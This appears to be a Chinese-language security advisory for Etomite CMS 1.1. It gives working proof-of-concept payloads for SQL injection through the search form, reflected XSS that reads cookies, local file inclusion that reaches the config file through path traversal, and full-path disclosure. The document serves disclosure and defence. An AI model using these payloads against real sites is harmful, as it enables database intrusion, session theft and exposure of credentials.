Etomite 1.1 多处漏洞分析
时间:2010-12-03 来源:High-Tech Bridge SA
发布日期:2010-12.03
发布作者:High-Tech Bridge SA
影响版本:Version: 1.1
官方地址:http://www.etomite.org
漏洞类型:SQL注入
漏洞描述:由于该漏洞存在于“/的index.php”脚本没有经过过滤就提供搜索变量的输入。攻击者可以修改应用程序SQL查询到数据库,执行任意查询数据库,妥协的应用程序,访问或修改敏感数据,或利用底层的SQL数据库中的各种漏洞。
SQL注入:
POC:
<form action="http://etomite/index.php?id=14" method="post" name="main" >
<input type="hidden" name="search" value="pentest')/**/union/**/select/**/1,2,3,@@version/**/#" />
<input type="submit" value="submit" name="submit" />
</form>
XSS跨站:
POC:
http://[host]/manager/index.php?location=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
本地文件包含:
由于该漏洞存在于“/manager/actions/static/ document_data.static.action.php”,远程用户可以查看任何本地文件。
http://etomite/manager/actions/static/document_data.static.action.php?id=/../../../../includes/config.inc.php%00
敏感信息泄漏:爆物理路径
由于该漏洞存在于“/ manager/frames/3.php”脚本失败,有可能产生错误,从而揭开了脚本的完整路径。远程用户可以决定到Web根目录和其他潜在的敏感信息的完整路径。
POC:http://[host]/manager/frames/3.php
标签分类: SQL注入 漏洞分析 XSS跨站